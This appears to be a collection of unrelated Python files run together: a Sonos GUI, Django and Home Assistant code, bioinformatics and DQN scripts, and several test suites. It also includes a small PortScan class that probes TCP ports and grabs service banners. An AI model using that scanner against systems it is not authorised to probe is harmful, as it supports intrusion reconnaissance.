import soco as sonosLib
class Example(ttk.Frame):
    """Main window: controls the selected Sonos speaker and streams a URI.

    Python 2 / Tkinter code (see the Tkinter/urllib2 imports in this file).
    """
    def __init__(self, parent):
        ttk.Frame.__init__(self, parent)
        self.parent = parent
        # Discover all Sonos speakers on the network; default to the first.
        self.lstSonos = list(sonosLib.discover())
        self.sonos = self.lstSonos[0]
        self.counter = 0
        self.initUI()
    def initUI(self):
        """Build all widgets and perform the initial UI refresh."""
        self.parent.title("Sonos URI")
        self.pack(fill=tk.BOTH, expand=1)
        self.style = ttk.Style()
        self.style.theme_use("default")
        # Audio Contols
        frame0 = ttk.Frame(self)
        frame0.pack(fill=tk.BOTH)
        self.btnMute = ttk.Button(frame0, text="Mute", width=6)
        self.btnMute.pack(side=tk.LEFT, padx=2)
        self.btnMute.bind('<Button-1>', self.onMute)
        self.volume = tk.Scale(frame0, from_=0, to=100, orient=tk.HORIZONTAL, showvalue=0)
        self.volume.pack(side=tk.LEFT, padx=2)
        self.volume.bind('<ButtonRelease>', self.onSlide)
        btnStop = ttk.Button(frame0, text="Stop", width=4)
        btnStop.pack(side=tk.LEFT, padx=2)
        btnStop.bind('<Button-1>', self.onStop)
        self.btnPrev = ttk.Button(frame0, text="<< Prev", width=6)
        self.btnPrev.pack(side=tk.LEFT, padx=(125,2))
        self.btnPrev.bind('<Button-1>', self.onPrevious)
        self.btnPlayPause = ttk.Button(frame0, text="?????", width=5)
        self.btnPlayPause.pack(side=tk.LEFT, padx=2)
        self.btnPlayPause.bind('<Button-1>', self.onPlayPause)
        self.btnNext = ttk.Button(frame0, text="Next >>", width=6)
        self.btnNext.pack(side=tk.LEFT, padx=2)
        self.btnNext.bind('<Button-1>', self.onNext)
        self.btnStatusLight = ttk.Button(frame0, text="Led Off", width=6)
        self.btnStatusLight.pack(side=tk.RIGHT, padx=2)
        self.btnStatusLight.bind('<Button-1>', self.onStatusLight)
        self.lstSonosPlayerName = []
        for i in self.lstSonos:
            self.lstSonosPlayerName.append(i.player_name)
        self.lstSonosPlayerName.sort()
        self.varSonosPlayerName = tk.StringVar()
        if 'Living Room' in self.lstSonosPlayerName:
            # NOTE: Python 2 filter() returns a list; this indexing breaks on Python 3.
            self.sonos = filter(lambda speaker: speaker.player_name == 'Living Room', self.lstSonos)[0]
        self.varSonosPlayerName.set(self.sonos.player_name)
        self.dropSonosPlayerName = tk.OptionMenu(frame0,self.varSonosPlayerName,*self.lstSonosPlayerName, command=self.onDropSonos)
        self.dropSonosPlayerName.config(width=14)
        self.dropSonosPlayerName.pack(side=tk.RIGHT, padx=6)
        # Audio Track Info
        frameTrack = ttk.Frame(self)
        frameTrack.pack(fill=tk.BOTH, pady=(10,3))
        self.lblTrack = ttk.Label(frameTrack, text="Track")
        self.lblTrack.pack(side=tk.LEFT)
        frameArtist = ttk.Frame(self)
        frameArtist.pack(fill=tk.BOTH, pady=3)
        self.lblArtist = ttk.Label(frameArtist, text="Artist")
        self.lblArtist.pack(side=tk.LEFT, padx=2, pady=2)
        frameAlbum = ttk.Frame(self)
        frameAlbum.pack(fill=tk.BOTH, pady=3)
        self.lblAlbum = ttk.Label(frameAlbum, text="Album")
        self.lblAlbum.pack(side=tk.LEFT, padx=2, pady=2)
        # Frame
        frame = ttk.Frame(self, relief=tk.RAISED, borderwidth=1)
        frame.pack(fill=tk.BOTH, expand=True)
        self.pack(fill=tk.BOTH, expand=True)
        # Uri
        self.btnZenCast = ttk.Button(frame, text="ZenCast")
        self.btnZenCast.pack(side=tk.LEFT, padx=2)
        self.btnZenCast.bind('<Button-1>', self.onZenCast)
        self.lblUri = ttk.Label(frame, text="URI")
        self.lblUri.pack(side=tk.LEFT, padx=2, pady=2)
        self.entryUri = ttk.Entry(frame)
        self.entryUri.pack(side=tk.LEFT, padx=2, fill=tk.X, expand=True)
        self.btnSend = ttk.Button(frame, text="Send")
        self.btnSend.pack(side=tk.RIGHT, padx=2)
        self.btnSend.bind('<Button-1>', self.onSend)
        frameMsg = ttk.Frame(self)
        frameMsg.pack(fill=tk.BOTH)
        self.lblStatus = ttk.Label(frameMsg, text="")
        self.lblStatus.pack(side=tk.LEFT, padx=2, pady=2)
        self.myUIRefresh()
        # mbox.showinfo('Test Message', 'Got Here')
    def onDropSonos(self, val):
        """Switch the active speaker to the one chosen in the dropdown."""
        pn = self.varSonosPlayerName.get()
        for i in self.lstSonos:
            if i.player_name == pn:
                self.sonos = i
                self.myUIRefresh()
                break
    def onSlide(self, val):
        self.sonos.volume=self.volume.get()
    def onMute(self, var):
        self.sonos.mute = not self.sonos.mute
    def onStatusLight(self, var):
        self.sonos.status_light = not self.sonos.status_light
        self.myStatusLight('refresh')
    def onPrevious(self, var):
        try:
            self.sonos.previous()
            self.myTrackInfo('refresh')
        except sonosLib.exceptions.SoCoException:
            # Already at the first track: disable the button instead of erroring.
            self.btnPrev['state'] = 'disabled'
        # mbox.showerror('Sonos Previous','You are on the first track')
    def onNext(self, var):
        try:
            self.sonos.next()
            self.myTrackInfo('refresh')
        except sonosLib.exceptions.SoCoException:
            # Already at the last track: disable the button instead of erroring.
            self.btnNext['state'] = 'disabled'
        # mbox.showerror('Sonos Next','You are on the last track')
    def onZenCast(self, val):
        # Build the ZenCast episode URL from the number typed in the entry.
        audioUrl = 'http://traffic.libsyn.com/amberstar/Zencast' + self.entryUri.get() + '.mp3'
        self.entryUri.delete(0, tk.END)
        self.entryUri.insert(0, audioUrl)
        self.onSend(audioUrl)
    def onSend(self, val):
        """Validate the entered URI and stream it to the active speaker."""
        audioUrl = self.entryUri.get()
        if urlExist(audioUrl):
            self.sonos.play_uri(audioUrl)
            self.myTrackInfo('refresh')
            self.myPlayPause('pause')
            self.entryUri.delete(0, tk.END)
        else:
            mbox.showerror('URI Error','URI '+ audioUrl + ' does not exist!' )
    def onSelect(self, val):
        sender = val.widget
        idx = sender.curselection()
        value = sender.get(idx)
        self.varLb.set(value)
    def onStop(self, var):
        self.myPlayPause('stop')
    def onPlayPause(self, val):
        """Toggle play/pause based on the current transport state."""
        varCTS = self.myPlayPause('refresh')
        if varCTS=='PLAYING':
            self.myPlayPause('pause')
        elif varCTS=='PAUSED_PLAYBACK':
            self.myPlayPause('play')
        elif varCTS=='STOPPED':
            self.myPlayPause('play')
        self.myPlayPause('refresh')
    def myPlayPause(self, var):
        """Issue a transport command ('play'/'pause'/'stop'/'refresh'),
        poll until the speaker leaves TRANSITIONING/UNKNOWN (10s timeout),
        update the button/status labels, and return the final state."""
        if var == 'play':
            self.sonos.play()
        elif var == 'pause':
            self.sonos.pause()
        elif var == 'stop':
            self.sonos.stop()
        timeUntil = time.time() + 10
        varCTS = self.sonos.get_current_transport_info()['current_transport_state']
        while varCTS == 'TRANSITIONING' or varCTS == 'UNKNOWN':
            self.lblStatus['text'] = varCTS + '.'
            time.sleep(0.1)
            varCTS = self.sonos.get_current_transport_info()['current_transport_state']
            if timeUntil < time.time():
                varCTS = 'TIMEOUT'
                break
        if varCTS=='TIMEOUT':
            self.btnPlayPause['text'] = '?????'
        elif varCTS=='PLAYING':
            self.btnPlayPause['text'] = 'Pause'
        elif varCTS=='PAUSED_PLAYBACK':
            self.btnPlayPause['text'] = 'Play'
        elif varCTS=='STOPPED':
            self.btnPlayPause['text'] = 'Play'
        self.lblStatus['text'] = varCTS
        return varCTS
    def myVolume(self, var):
        if var == 'refresh':
            self.volume.set(self.sonos.volume)
    def myStatusLight(self, var):
        if var == 'refresh':
            self.btnStatusLight['text'] = 'LED Off' if self.sonos.status_light else 'LED On'
    def myMute(self, var):
        if var == 'refresh':
            self.btnMute['text'] = 'Unmute' if self.sonos.mute else 'Mute'
    def myTrackInfo(self, var):
        track = self.sonos.get_current_track_info()
        if var == 'refresh':
            self.lblTrack['text'] = 'Track: ' + track['title']
            self.lblArtist['text'] = 'Artist: ' + track['artist']
            self.lblAlbum['text'] = 'Album: ' + track['album']
            self.btnNext['state'] = 'normal'
            self.btnPrev['state'] = 'normal'
    def myUIRefresh(self):
        """Refresh every widget from the speaker's current state."""
        self.myTrackInfo('refresh')
        self.myVolume('refresh')
        self.myMute('refresh')
        self.myStatusLight('refresh')
        self.myPlayPause('refresh')
import urllib2
def urlExist(url):
    """Return True if a HEAD request to `url` succeeds, False otherwise."""
    request = urllib2.Request(url)
    # Issue a HEAD request so we don't download the (audio) body.
    request.get_method = lambda : 'HEAD'
    try:
        urllib2.urlopen(request)
        return True
    except Exception:
        # FIX: narrowed from a bare `except:` so KeyboardInterrupt and
        # SystemExit are no longer swallowed. Any request failure (bad URL,
        # HTTP error, network error) still means "does not exist".
        return False
def main():
    """Create the root window, build the UI and start the Tk event loop."""
    root = tk.Tk()
    app = Example(root)
    root.geometry("900x350+300+300")
    root.mainloop()
# Script entry point.
if __name__ == '__main__':
    main()
|
from django.contrib import admin
from security.models import PasswordExpiry, CspReport
# Expose the security models in the Django admin with default ModelAdmin options.
admin.site.register(PasswordExpiry)
admin.site.register(CspReport)
|
# Read the protein sequence (single-letter amino-acid codes) and normalize case.
Full_length = input("Enter the sequence of your protein, in single letter code, here: ")
protein = Full_length.upper()
# Monoisotopic-style residue masses (Da) per amino acid.
# NOTE(review): this name shadows the builtin `dict`; renaming would require
# coordinated changes in alpha() below.
dict = {
    'G' : 57.052,
    'A' : 71.079,
    'S' : 87.078,
    'P' : 97.117,
    'V' : 99.133,
    'T' : 101.105,
    'C' : 103.144,
    'I' : 113.160,
    'L' : 113.160,
    'N' : 114.104,
    'D' : 115.089,
    'Q' : 128.131,
    'K' : 128.174,
    'E' : 129.116,
    'M' : 131.198,
    'H' : 137.142,
    'F' : 147.177,
    'R' : 156.188,
    'Y' : 163.170,
    'W' : 186.213
}
# Report 1-based positions of any characters that are not recognized residues.
unknown = []
for id in range (0, len(protein)):
    residue = protein[id]
    if not (residue in dict):
        unknown.append(id+1)
if len(unknown)>0:
    print("Unrecognized amino acid at the indicated positions: {}".format(unknown))
# Prompt until a numeric fragment mass is entered.
while True:
    try:
        fragment = float(input("Enter the mass (in Da) of your fragment here: "))
    except ValueError:
        print("Fragment must be a number indicating the size of your fragment in Da. Please enter a number.")
    else:
        break
# Prompt until a numeric error margin is entered.
while True:
    try:
        Error_margin = float(input("Enter an error margin (in Da) here: "))
    except ValueError:
        print("The margin of error has to be a number (in Da). Please enter a number.")
    else:
        break
# Subtract 18 Da — presumably the mass of water, since residue masses are
# for the condensed (peptide-bonded) form; confirm against the mass table used.
fragment -= 18
def alpha():
    """Search `protein` for contiguous subsequences whose summed residue
    mass matches `fragment` within `Error_margin`.

    Returns:
        A list of matching subsequences, or an explanatory string when the
        first residue is invalid or nothing matches.
    """
    for i in range(0, len(protein)):
        character = protein[i]
        if character in dict:
            def mass_spec():
                # Slide a start index along the protein; from each start,
                # grow the candidate until its mass exceeds the upper bound.
                matches = []  # renamed from `list`, which shadowed the builtin
                start_point = 0
                while start_point < len(protein):
                    total = 0
                    sequence = ""
                    for char in protein[start_point:]:
                        total += dict[char]
                        sequence += char
                        if total > fragment + Error_margin:
                            break
                        elif total < fragment - Error_margin:
                            continue
                        else:
                            matches.append(sequence)
                    start_point += 1
                if len(matches) > 0:
                    return matches
                else:
                    return ("No match found. Please increase the margin of error.")
            return (mass_spec())
        else:
            # BUG FIX: the placeholder was '%', which str.format ignores, so
            # the position number was never interpolated; '{}' is correct.
            return ("The amino acid at position '{}' is invalid".format(i+1))
print(alpha())
|
"""Config flow for AMD GPU integration."""
import logging
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from . import find_resources_in_config_entry
from .const import (
CONF_RESOURCES,
DOMAIN,
SENSOR_TYPES,
)
_LOGGER = logging.getLogger(__name__)
def _resource_schema_base(available_resources, selected_resources):
    """Build the voluptuous schema dict for selecting sensor resources."""
    # Offer only the sensors that are both defined and currently available,
    # labelled by their display name (first element of the sensor tuple).
    choices = {}
    for sensor_id, sensor in SENSOR_TYPES.items():
        if sensor_id in available_resources:
            choices[sensor_id] = sensor[0]
    selector = cv.multi_select(choices)
    return {vol.Required(CONF_RESOURCES, default=selected_resources): selector}
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
    """Handle a config flow for AMD GPU."""
    def __init__(self):
        # User selections collected so far; becomes the config entry data.
        self.gpu_config = {}
        # All sensor ids defined by the integration are offered for selection.
        self.available_resources = SENSOR_TYPES.keys()
    async def async_step_user(self, user_input=None):
        """Invoked when a user initiates a flow via the user interface."""
        # Only one instance of this integration may be configured.
        if self._async_current_entries():
            return self.async_abort(reason="single_instance_allowed")
        if user_input is None:
            # First pass: show the resource-selection form (nothing selected).
            return self.async_show_form(
                step_id="user",
                data_schema=vol.Schema(
                    _resource_schema_base(self.available_resources, [])
                ),
            )
        self.gpu_config.update(user_input)
        return self.async_create_entry(title=DOMAIN, data=self.gpu_config)
    @staticmethod
    @callback
    def async_get_options_flow(config_entry):
        """Get the options flow for this handler."""
        return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
    """Invoked when a user reconfigures via the user interface."""
    def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
        # Keep the entry so the current resource selection can be re-shown.
        self.config_entry = config_entry
        self.available_resources = SENSOR_TYPES.keys()
    async def async_step_init(self, user_input=None):
        """Manage the options."""
        if user_input is not None:
            # Submission: persist the new selection as the entry's options.
            return self.async_create_entry(title="", data=user_input)
        # First visit: pre-select the resources stored on the config entry.
        resources = find_resources_in_config_entry(self.config_entry)
        base_schema = _resource_schema_base(self.available_resources, resources)
        return self.async_show_form(step_id="init", data_schema=vol.Schema(base_schema))
|
from django import forms
class UrbanAcroForm(forms.Form):
    """Urban acro signup form; contact details are mandatory."""
    name = forms.CharField(required=True)
    address = forms.CharField(required=True)
    phone = forms.CharField(required=True)
    email = forms.EmailField(required=True)
    option = forms.CharField(required=False)
    comment = forms.CharField(required=False)
class WinterAcroForm(forms.Form):
    """Winter acro signup form; every field is optional."""
    name = forms.CharField(required=False)
    address = forms.CharField(required=False)
    phone = forms.CharField(required=False)
    # EmailField for consistency with UrbanAcroForm: validates the address
    # format when a value is supplied, while remaining optional.
    email = forms.EmailField(required=False)
    option = forms.CharField(required=False)
    allergies = forms.CharField(required=False)
    donation = forms.CharField(required=False)
    date = forms.DateField(required=False)
|
import base64
import os
# Required configuration, read from the environment at import time.
# Explicit raises instead of `assert`: assertions are stripped when Python
# runs with -O, which would silently allow a None shortcode/passkey through.
mpesa_express_business_shortcode = os.getenv(
    "MPESA_EXPRESS_BUSINESS_SHORTCODE")
if mpesa_express_business_shortcode is None:
    raise RuntimeError("missing mpesa_express_business_shortcode")
lipa_na_mpesa_passkey = os.getenv("LIPA_NA_MPESA_PASSKEY")
if lipa_na_mpesa_passkey is None:
    raise RuntimeError("Missing lipa_na_mpesa_passkey")
def generate_request_passwd(timestamp: str) -> str:
    """
    Generates the password used to encrypt the request sent for an STK push transaction.
    :timestamp - This is the Timestamp of the transaction, normaly in the formart of
    YEAR+MONTH+DATE+HOUR+MINUTE+SECOND (YYYYMMDDHHMMSS)
    :return - A base64 encoded string
    """
    # shortcode + passkey + timestamp, base64-encoded, returned as text.
    raw = mpesa_express_business_shortcode + lipa_na_mpesa_passkey + timestamp
    encoded = base64.b64encode(raw.encode("utf-8"))
    return encoded.decode("utf-8")
|
from agent import Qnet
from agent import ReplayBuffer
from agent import train
# DQN training loop: online network `q`, periodically-synced target `q_target`.
# NOTE(review): `optim`, `torch`, `np`, `env` and `learning_rate` are not
# imported/defined in this file's visible imports — confirm they are supplied
# by the execution environment this script runs in.
q = Qnet()
q_target = Qnet()
# Target network starts as an exact copy of the online network.
q_target.load_state_dict(q.state_dict())
memory = ReplayBuffer()
print_interval = 20
score = 0.0
optimizer = optim.Adam(q.parameters(), lr=learning_rate)
score_history= []
for n_epi in range(3000):
    epsilon = max(0.01, 0.08 - 0.01*(n_epi/200)) #Linear annealing from 8% to 1%
    s = env.reset(random_init=True)
    done = False
    n_step =0
    while not done:
        n_step +=1
        # Epsilon-greedy action from the online network.
        a = q.sample_action(torch.from_numpy(np.array(s)).float(), epsilon)
        s_prime, r, done = env.transition(a)
        done_mask = 0.0 if done else 1.0  # 0.0 marks terminal transitions
        memory.put((s,a,r,s_prime, done_mask))
        score += r
        if done:
            break
        s = s_prime
    # Train only once the replay buffer holds enough transitions.
    if memory.size()>2000:
        train(q, q_target, memory, optimizer)
    # Periodically sync the target network and report the averaged score.
    if n_epi%print_interval==0 and n_epi!=0:
        q_target.load_state_dict(q.state_dict())
        print("n_episode :{}, score : {:.1f}, n_buffer : {}, eps : {:.1f}%, n_step:{}".format(n_epi, score/print_interval, memory.size(), epsilon*100, n_step))
        score_history.append(score/print_interval)
        score = 0.0
r''' Source file for merge_dats_logs() '''
from os import chdir, getcwd, listdir, remove, rename
PREFIX = "_c_"       # prefix of the in-progress combination file
DEBUGGING = False    # set True for verbose merge tracing
# Fixed-width record for renumbered DAT lines (12 fields).
# NOTE(review): the continuation adds no space between fields 8 and 9, so
# those columns can abut when values fill their width — confirm intended.
DATLNFMT = '{:>4s} {:>12s} {:>12s} {:>12s} {:>12s} {:>9s} {:>12s} {:>12s}' \
           + '{:>4s} {:>12s} {:>5s} {:>9s}\n'
def merge_dats_logs(arg_h5: str, arg_dir: str, arg_type: str, cleanup='n'):
    r"""
    Merge multiple DAT (or LOG) files.
    Parameters
    ----------
    arg_h5 : str
        HDF5 file used by FindDoppler.search to produce the DAT and LOG
        files; only its basename (minus '.h5') is used, to select files.
    arg_dir : str
        Directory holding multiple DAT and LOG files after FindDoppler.search()
        which ran with more than 1 partition.
    arg_type : str
        File extension of interest ('dat' or 'log').
    cleanup : str
        'y' => remove the partition files and rename the merged file to
        <stem>.<arg_type>.  Any other value keeps the partitions and leaves
        the merged file with the '_c_' prefix.
    """
    print("merge_dats_logs: dir={}, type={}, cleanup={}"
          .format(arg_dir, arg_type, cleanup))
    return_to = getcwd()  # restored in the finally block, even on error
    chdir(arg_dir)
    try:
        suffix = '.' + arg_type  # E.g. '.dat'
        filenamestem = arg_h5.split('/')[-1].replace('.h5', '')
        len_filenamestem = len(filenamestem)
        print('merge_dats_logs: Working on filename-stem {} type {}'
              .format(filenamestem, arg_type))
        sorted_file_list = sorted(listdir(arg_dir))
        if DEBUGGING:
            print("DEBUG merge_dats_logs: listdir=", sorted_file_list)
        # Select partitions: right extension, not a previously built
        # combination file, and matching the HDF5 filename stem.
        files = []
        for cur_file in sorted_file_list:
            if cur_file.startswith(PREFIX):
                continue
            if cur_file.split('.')[-1] != arg_type:
                continue
            if cur_file[0:len_filenamestem] != filenamestem:
                continue
            files.append(cur_file)
            if DEBUGGING:
                print("DEBUG merge_dats_logs: Selected for merging: ", cur_file)
        if not files:
            print("*** merge_dats_logs: Nothing selected for merging")
            return
        # Append every partition into the combination file.
        path_prefixed_combo = PREFIX + filenamestem + suffix
        with open(path_prefixed_combo, "w") as outfile:
            # First file is copied verbatim, keeping its '#' header lines.
            with open(files[0], "r") as fd:
                for line in fd:
                    outfile.write(line)
            # Subsequent files: drop comment lines; for DAT files also
            # renumber the top-hit (first) field sequentially.
            tophit_counter = 0
            for cur_file in files[1:]:
                with open(cur_file, "r") as fd:
                    for inline in fd:
                        if inline.startswith("#"):  # comment line
                            continue
                        if arg_type == 'dat':
                            tophit_counter += 1
                            outlist = inline.split()
                            if DEBUGGING:
                                print('DEBUG outlst:', outlist)
                            outlist[0] = str(tophit_counter)
                            outfile.write(DATLNFMT.format(*outlist))
                        else:  # log file: copy unchanged
                            outfile.write(inline)
        if cleanup == 'y':
            # Remove the partitions and give the combo its final name.
            for cur_file in files:
                remove(cur_file)
                if DEBUGGING:
                    print("merge_dats_logs: Removed: ", cur_file)
            path_merge_file = filenamestem + suffix
            try:
                rename(path_prefixed_combo, path_merge_file)
                print("merge_dats_logs: Merged into", path_merge_file)
            except Exception as exc:
                print("*** os.rename({}, {}) failed, reason:{}\n"
                      .format(path_prefixed_combo, path_merge_file, str(exc)))
    finally:
        # Always return to the caller's directory, even if merging raised.
        chdir(return_to)
|
# Run configuration: dummy-municipality selection and column-name constants.
dummy_compute = False
dummy_mun_codes = [147, 151, 153, 165, 400]
# Zero-padded 4-character municipality codes (all source codes are 3 digits).
dummy_mun_codes_4char = ['{:04d}'.format(m) for m in dummy_mun_codes]
cell_label = 'DDKNm100'
years_num = list(range(2010, 2020))
years = [str(y) for y in years_num]
years_hh = [y + '_hh' for y in years]
years_pers = [y + '_pers' for y in years]
mean_cols = ['mean_pers', 'mean_hh']
minimum_cols = ['minimum_pers', 'minimum_hh']
# modified into a class
import socket
from IPy import IP
from termcolor import colored
class PortScan():
    """Simple TCP connect scanner for a single target host."""

    def __init__(self, target, port_num):
        self.target = target      # hostname or dotted-quad IP string
        self.port_num = port_num  # upper bound (exclusive) of ports to probe
        # Bug fix: these were class-level lists, so every PortScan instance
        # shared (and appended to) the same results.  Per-instance now.
        self.banners = []
        self.open_ports = []

    def scan(self):
        """Probe TCP ports 1..port_num-1 on the target.

        Bug fix: the range was hard-coded to 1..99, silently ignoring the
        port_num argument the caller supplied.
        """
        for port in range(1, self.port_num):
            self.scan_port(port)

    def check_ip(self):
        """Return the target as an IP string, resolving hostnames via DNS."""
        try:
            IP(self.target)  # raises ValueError if not an IP literal
            return self.target
        except ValueError:
            return socket.gethostbyname(self.target)

    def scan_port(self, port):
        """Attempt a TCP connect to `port`; record it and its banner if open."""
        try:
            converted_ip = self.check_ip()
            sock = socket.socket()
            sock.settimeout(0.5)
            sock.connect((converted_ip, port))
            self.open_ports.append(port)
            try:
                banner = sock.recv(1024).decode().strip('\n').strip('\r')
                self.banners.append(banner)
            except (OSError, UnicodeDecodeError):
                # Port is open but gave no readable banner; keep the two
                # result lists index-aligned with a placeholder.
                self.banners.append(' ')
            sock.close()
        except (OSError, ValueError):
            # Closed/filtered port, timeout, or name-resolution failure.
            pass
|
import logging
from tornado.ioloop import IOLoop
from tornado.gen import coroutine
from tornado import autoreload
from django.conf import settings
from .workers import (TickerWatcher, TransactionsWatcher,
OrdersWatcher, Monitoring)
log = logging.getLogger(__name__)
@coroutine
def main_loop():
    """Run all background workers: one warm-up pass, then forever in parallel."""
    log.info('starting main loop')
    workers = [
        Monitoring(),
        TickerWatcher(),
        TransactionsWatcher(),
        OrdersWatcher()
    ]
    # First run them sequentially to avoid race conditions.
    for worker in workers:
        yield worker.run_once()
    # Then forever in parallel.
    # (yielding a list makes Tornado wait on all the futures concurrently)
    yield [worker.run_forever() for worker in workers]
def main():
    """Entry point: enable autoreload in DEBUG, then block on the main loop."""
    if settings.DEBUG:
        log.info('starting Tornado autoreload')
        autoreload.start()
    log.info('*** main() ***')
    try:
        # run_sync blocks until main_loop completes (normally it never does).
        IOLoop.instance().run_sync(main_loop)
    except KeyboardInterrupt:
        log.info('^C, quitting')
if __name__ == '__main__':
    main()
|
from integrations.new_relic.new_relic import NewRelicWrapper, EVENTS_API_URI
def test_new_relic_initialized_correctly():
    """The wrapper assembles its deployments URL from base URL and app id."""
    # Given
    base_url = "http://test.com"
    api_key = "123key"
    app_id = "123id"
    # When initialized
    wrapper = NewRelicWrapper(base_url=base_url, api_key=api_key, app_id=app_id)
    # Then
    assert wrapper.url == f"{base_url}{EVENTS_API_URI}{app_id}/deployments.json"
def test_new_relic_when_generate_event_data_with_correct_values_then_success():
    """generate_event_data builds a deployment payload from log/email/env."""
    # Given
    log, email, env = "some log data", "tes@email.com", "test"
    wrapper = NewRelicWrapper(
        base_url="http://test.com", api_key="123key", app_id="123id"
    )
    # When
    event_data = wrapper.generate_event_data(
        log=log, email=email, environment_name=env
    )
    # Then
    deployment = event_data.get("deployment")
    assert deployment is not None
    assert deployment["revision"] == f"env:{env}"
    assert deployment["changelog"] == f"{log} by user {email}"
def test_new_relic_when_generate_event_data_with_missing_values_then_success():
    """Missing log/email must not break payload generation.

    (Name fix: the original contained a duplicated 'with_with'.)
    """
    # Given
    log = None
    email = None
    env = "test"
    new_relic = NewRelicWrapper(
        base_url="http://test.com", api_key="123key", app_id="123id"
    )
    # When
    event_data = new_relic.generate_event_data(
        log=log, email=email, environment_name=env
    )
    # Then: None values are interpolated as the string 'None'.
    expected_event_text = f"{log} by user {email}"
    assert event_data.get("deployment") is not None
    event_deployment_data = event_data.get("deployment")
    assert event_deployment_data["revision"] == f"env:{env}"
    assert event_deployment_data["changelog"] == expected_event_text
def test_new_relic_when_generate_event_data_with_missing_env_then_success():
    """A missing environment name must not break payload generation.

    (Name fix: the original said 'test_new_dog' — a copy-paste from another
    integration's tests — and duplicated 'with_with'.)
    """
    # Given
    log = "some log data"
    email = "tes@email.com"
    env = None
    new_relic = NewRelicWrapper(
        base_url="http://test.com", api_key="123key", app_id="123id"
    )
    # When
    event_data = new_relic.generate_event_data(
        log=log, email=email, environment_name=env
    )
    # Then: env=None is interpolated as the string 'None'.
    expected_event_text = f"{log} by user {email}"
    assert event_data.get("deployment") is not None
    event_deployment_data = event_data.get("deployment")
    assert event_deployment_data["revision"] == f"env:{env}"
    assert event_deployment_data["changelog"] == expected_event_text
|
from django.db import models
from django.contrib.auth.models import User
from PIL import Image
import io
from django.core.files.storage import default_storage as storage
from phonenumber_field.modelfields import PhoneNumberField
class Profile(models.Model):
    """Extra per-user data: phone number and avatar image."""
    user = models.OneToOneField(User, on_delete=models.CASCADE,
                                verbose_name="Пользователь")
    phone = PhoneNumberField(null=False, blank=True, verbose_name="Телефон")
    image = models.ImageField(default='default.jpg',
                              upload_to='profile_pics',
                              verbose_name="Изображение")
    class Meta:
        verbose_name = 'Профиль'
        verbose_name_plural = 'Профили'
    def __str__(self):
        return f'{self.user.username} Profile'
    def save(self, *args, **kwargs):
        """Persist the model, then downscale an oversized avatar in place."""
        # Save first so self.image.name refers to the stored file.
        super().save(*args, **kwargs)
        # NOTE(review): modes 'r'/'w+' are passed to the storage backend for
        # binary image data — confirm the backend treats these as binary.
        img_read = storage.open(self.image.name, 'r')
        img = Image.open(img_read)
        if img.height > 300 or img.width > 300:
            # Shrink to at most 300x300 (aspect ratio preserved) and
            # re-save as JPEG through the same storage backend.
            output_size = (300, 300)
            img.thumbnail(output_size)
            in_mem_file = io.BytesIO()
            img.convert('RGB').save(in_mem_file, format='JPEG')
            img_write = storage.open(self.image.name, 'w+')
            img_write.write(in_mem_file.getvalue())
            img_write.close()
        img_read.close()
|
from django.urls import reverse
def test_sales_dashboard_index(superuser_authenticated_client):
    """
    VERY basic test to check that the index page loads.
    """
    response = superuser_authenticated_client.get(
        reverse("sales_dashboard:index")
    )
    assert response.status_code == 200
|
# Copyright 2019 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests of the stratis CLI.
"""
# isort: STDLIB
import argparse
import sys
import time
import unittest
# isort: THIRDPARTY
from testlib.stratis import STRATIS_CLI, clean_up
from testlib.utils import exec_command, exec_test_command, fs_n, p_n, process_exists
DISKS = []
def make_test_pool(pool_disks):
    """
    Create a test pool that will later get destroyed
    :param list pool_disks: List of disks with which the pool will be created
    :return: Name of the created pool
    """
    name = p_n()
    code, _, err = exec_test_command(
        [STRATIS_CLI, "pool", "create", name] + pool_disks
    )
    assert code == 0, "return_code: %s, stderr: %s" % (code, err)
    return name
def make_test_filesystem(pool_name):
    """
    Create a test filesystem that will later get destroyed
    :param pool_name: Name of a test pool
    :return: Name of the created filesystem
    """
    name = fs_n()
    code, _, err = exec_test_command(
        [STRATIS_CLI, "filesystem", "create", pool_name, name]
    )
    assert code == 0, "return_code: %s, stderr: %s" % (code, err)
    return name
class StratisCertify(unittest.TestCase):
    """
    Unit tests for Stratis
    """
    def setUp(self):
        """
        Setup for an individual test.
        * Register a cleanup action, to be run if the test fails.
        * Ensure that stratisd is running via systemd.
        * Use the running stratisd instance to destroy any existing
        Stratis filesystems, pools, etc.
        * Call "udevadm settle" so udev database can be updated with changes
        to Stratis devices.
        :return: None
        """
        self.addCleanup(clean_up)
        if process_exists("stratisd") is None:
            exec_command(["systemctl", "start", "stratisd"])
            time.sleep(20)
        clean_up()
        exec_command(["udevadm", "settle"])
    def unittest_command(self, args, exp_exit_code, exp_stderr_is_empty, exp_stdout_is_empty):
        """
        Execute a test command and make assertions about the exit code, stderr, and stdout
        :param args: The arguments needed to execute the Stratis command being tested
        :type args: List of str
        :param int exp_exit_code: The expected exit code, 0, 1, or 2
        :param bool exp_stderr_is_empty: True if stderr is expected to be empty, otherwise False
        :param bool exp_stdout_is_empty: True if stdout is expected to be empty, otherwise False
        :return: None
        """
        exit_code, stdout, stderr = exec_test_command(args)
        self.assertEqual(exit_code, exp_exit_code)
        if exp_stderr_is_empty:
            self.assertEqual(stderr, "")
        else:
            self.assertNotEqual(stderr, "")
        if exp_stdout_is_empty:
            self.assertEqual(stdout, "")
        else:
            self.assertNotEqual(stdout, "")
    def test_stratisd_version(self):
        """
        Test getting the daemon version.
        """
        self.unittest_command([STRATIS_CLI, "daemon", "version"], 0, True, False)
    def test_stratisd_redundancy(self):
        """
        Test listing the redundancy levels that the Stratis service supports.
        """
        self.unittest_command([STRATIS_CLI, "daemon", "redundancy"], 0, True, False)
    def test_pool_list_empty(self):
        """
        Test listing a non-existent pool.
        """
        self.unittest_command([STRATIS_CLI, "pool", "list"], 0, True, False)
    def test_filesystem_list_empty(self):
        """
        Test listing an non-existent filesystem.
        """
